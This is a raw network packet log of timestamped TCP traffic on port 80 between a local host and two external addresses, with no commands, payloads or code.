Dec 13, 2024 07:47:16.704715014 CET	49754	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:16.704917908 CET	80	49750	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:16.704993010 CET	49754	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:16.705101013 CET	49750	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:16.719538927 CET	80	49755	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:16.719651937 CET	49755	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:16.719799042 CET	49755	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:16.719871044 CET	80	49751	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:16.719938040 CET	49751	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:16.824695110 CET	80	49754	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:16.839610100 CET	80	49755	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:16.954813957 CET	80	49746	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:16.957916975 CET	49746	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:16.985627890 CET	80	49747	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:16.985893011 CET	49747	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:18.049957991 CET	80	49754	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:18.050044060 CET	49754	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:18.064918995 CET	80	49755	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:18.065016031 CET	49755	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:19.438261986 CET	80	49748	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:19.438338995 CET	49748	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:19.563644886 CET	80	49749	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:19.564380884 CET	49749	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:19.800697088 CET	49754	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:19.800702095 CET	49755	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:19.801139116 CET	49757	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:19.801142931 CET	49758	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:19.921082020 CET	80	49754	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:19.921135902 CET	80	49757	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:19.921152115 CET	80	49758	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:19.921188116 CET	49754	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:19.921272993 CET	49758	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:19.921277046 CET	49757	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:19.921374083 CET	80	49755	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:19.921533108 CET	49758	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:19.921536922 CET	49757	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:19.921616077 CET	49755	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:20.041395903 CET	80	49758	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:20.041423082 CET	80	49757	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:20.968688011 CET	80	49752	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:20.968858004 CET	49752	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:21.062755108 CET	80	49753	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:21.064207077 CET	49753	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:21.282970905 CET	80	49758	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:21.283061981 CET	49758	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:21.332618952 CET	80	49757	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:21.332803011 CET	49757	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:22.910316944 CET	49758	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:22.910763979 CET	49759	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:22.958363056 CET	49757	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:22.958803892 CET	49760	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:23.030668020 CET	80	49758	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:23.030761957 CET	49758	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:23.030992985 CET	80	49759	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:23.031141996 CET	49759	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:23.031424999 CET	49759	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:23.078844070 CET	80	49760	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:23.079488993 CET	80	49757	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:23.079648018 CET	49757	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:23.079931021 CET	49760	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:23.079931021 CET	49760	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:23.151566982 CET	80	49759	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:23.199778080 CET	80	49760	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:24.376986027 CET	80	49759	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:24.377909899 CET	49759	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:24.424125910 CET	80	49760	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:24.425966978 CET	49760	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:25.895836115 CET	49759	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:25.895988941 CET	49761	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:25.941962957 CET	49760	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:25.943552017 CET	49762	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:26.015780926 CET	80	49761	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:26.016123056 CET	80	49759	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:26.016207933 CET	49759	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:26.016318083 CET	49761	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:26.016742945 CET	49761	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:26.062313080 CET	80	49760	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:26.063350916 CET	80	49762	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:26.063496113 CET	49760	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:26.063496113 CET	49762	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:26.064805031 CET	49762	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:26.136461020 CET	80	49761	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:26.184495926 CET	80	49762	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:27.397629023 CET	80	49761	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:27.398057938 CET	49761	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:27.440025091 CET	80	49762	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:27.441914082 CET	49762	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:29.023332119 CET	49761	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:29.023413897 CET	49763	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:29.067596912 CET	49762	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:29.067780018 CET	49764	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:29.143421888 CET	80	49763	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:29.143534899 CET	49763	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:29.143881083 CET	80	49761	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:29.143975019 CET	49761	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:29.144040108 CET	49763	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:29.187622070 CET	80	49764	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:29.187750101 CET	49764	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:29.187833071 CET	80	49762	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:29.187905073 CET	49762	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:29.191658974 CET	49764	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:29.263847113 CET	80	49763	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:29.311542034 CET	80	49764	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:30.477885962 CET	80	49763	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:30.477967024 CET	49763	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:30.534275055 CET	80	49764	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:30.534559011 CET	49764	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:32.003890038 CET	49763	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:32.004298925 CET	49765	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:32.066260099 CET	49764	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:32.066627979 CET	49766	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:32.124041080 CET	80	49765	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:32.124177933 CET	49765	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:32.124228954 CET	80	49763	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:32.124317884 CET	49763	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:32.124402046 CET	49765	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:32.186427116 CET	80	49766	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:32.186527014 CET	80	49764	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:32.186578989 CET	49766	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:32.186636925 CET	49764	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:32.186872005 CET	49766	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:32.244148970 CET	80	49765	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:32.306565046 CET	80	49766	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:33.475101948 CET	80	49765	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:33.475289106 CET	49765	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:33.551990986 CET	80	49766	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:33.552444935 CET	49766	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:35.097536087 CET	49765	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:35.097846985 CET	49767	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:35.184417009 CET	49766	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:35.185750008 CET	49768	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:35.217621088 CET	80	49767	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:35.217744112 CET	49767	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:35.217905045 CET	80	49765	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:35.217941046 CET	49767	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:35.217966080 CET	49765	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:35.304821968 CET	80	49766	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:35.304908991 CET	49766	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:35.305588961 CET	80	49768	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:35.305685043 CET	49768	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:35.305869102 CET	49768	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:35.338030100 CET	80	49767	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:35.425626040 CET	80	49768	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:36.565433025 CET	80	49767	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:36.565962076 CET	49767	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:36.645472050 CET	80	49768	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:36.646255970 CET	49768	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:38.091336012 CET	49769	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:38.093064070 CET	49767	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:38.173053980 CET	49768	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:38.173053980 CET	49770	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:38.211210012 CET	80	49769	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:38.211292028 CET	49769	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:38.211528063 CET	49769	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:38.213211060 CET	80	49767	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:38.217823982 CET	49767	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:38.292984009 CET	80	49770	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:38.293103933 CET	49770	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:38.293203115 CET	80	49768	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:38.293263912 CET	49768	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:38.293263912 CET	49770	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:38.331305981 CET	80	49769	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:38.413116932 CET	80	49770	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:39.581466913 CET	80	49769	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:39.581656933 CET	49769	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:39.660887003 CET	80	49770	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:39.660962105 CET	49770	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:41.298943043 CET	49769	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:41.299237967 CET	49771	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:41.370497942 CET	49770	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:41.370855093 CET	49772	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:41.418960094 CET	80	49771	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:41.419040918 CET	80	49769	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:41.419056892 CET	49771	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:41.419118881 CET	49769	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:41.419322014 CET	49771	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:41.490617037 CET	80	49772	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:41.490766048 CET	80	49770	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:41.490796089 CET	49772	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:41.490817070 CET	49770	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:41.490995884 CET	49772	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:41.538969040 CET	80	49771	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:41.610726118 CET	80	49772	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:42.767491102 CET	80	49771	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:42.767577887 CET	49771	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:42.831105947 CET	80	49772	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:42.831227064 CET	49772	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:44.269613028 CET	49771	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:44.269902945 CET	49773	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:44.347696066 CET	49772	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:44.347999096 CET	49774	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:44.391408920 CET	80	49773	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:44.391479969 CET	80	49771	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:44.391505003 CET	49773	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:44.391545057 CET	49771	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:44.391789913 CET	49773	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:44.467904091 CET	80	49774	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:44.468018055 CET	49774	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:44.468204975 CET	49774	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:44.468215942 CET	80	49772	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:44.468333006 CET	49772	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:44.511568069 CET	80	49773	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:44.589983940 CET	80	49774	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:45.665481091 CET	49741	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.665669918 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.666120052 CET	49742	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.666254044 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.753319025 CET	80	49773	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.753921032 CET	49773	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.785423040 CET	80	49741	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.785445929 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.785561085 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.785794020 CET	80	49742	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.785799980 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.785877943 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.785916090 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:45.785990000 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.786025047 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.786058903 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.786094904 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.786119938 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.786161900 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.786185026 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.786226988 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.786262035 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.786288977 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.786320925 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.786351919 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.786384106 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.786416054 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.786467075 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.786494017 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.786524057 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.786566019 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.786596060 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.786631107 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.786659002 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.786690950 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.786731958 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.786758900 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.786792994 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.786820889 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.786855936 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.786895990 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.786921978 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.786953926 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.786987066 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.787033081 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.787062883 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.787089109 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.787123919 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.787153959 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.787187099 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.787220001 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.787261963 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.787291050 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.787339926 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.787360907 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.787379026 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.787421942 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.787451982 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.787484884 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.787512064 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.787543058 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.787574053 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.787617922 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.787645102 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.787673950 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.787710905 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.787745953 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.787780046 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.787820101 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.787849903 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.787890911 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.787919044 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.787959099 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.787993908 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.788022995 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.788060904 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.788091898 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.788129091 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.788163900 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.788192034 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.788233042 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.788260937 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.788304090 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.788332939 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.788366079 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.788393021 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.788430929 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.788459063 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.788491964 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.788522959 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.788558006 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.788589954 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.788621902 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.788654089 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.788696051 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.788722038 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.788758039 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.788786888 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.788825035 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.788860083 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.788887978 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.788921118 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.788953066 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.788983107 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.789017916 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.789046049 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.789079905 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.789109945 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.789144993 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.789176941 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.789211988 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.789242029 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.789277077 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.789314985 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.789345980 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.789376974 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.789411068 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.789443016 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.789474010 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.789505959 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.789540052 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.789570093 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.789603949 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.789635897 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.789674044 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.789707899 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.789741039 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.789774895 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.789808989 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.789840937 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.789874077 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.789905071 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.789937019 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.789967060 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.789999962 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.790030956 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.790064096 CET	49775	80	192.168.2.4	185.81.68.147
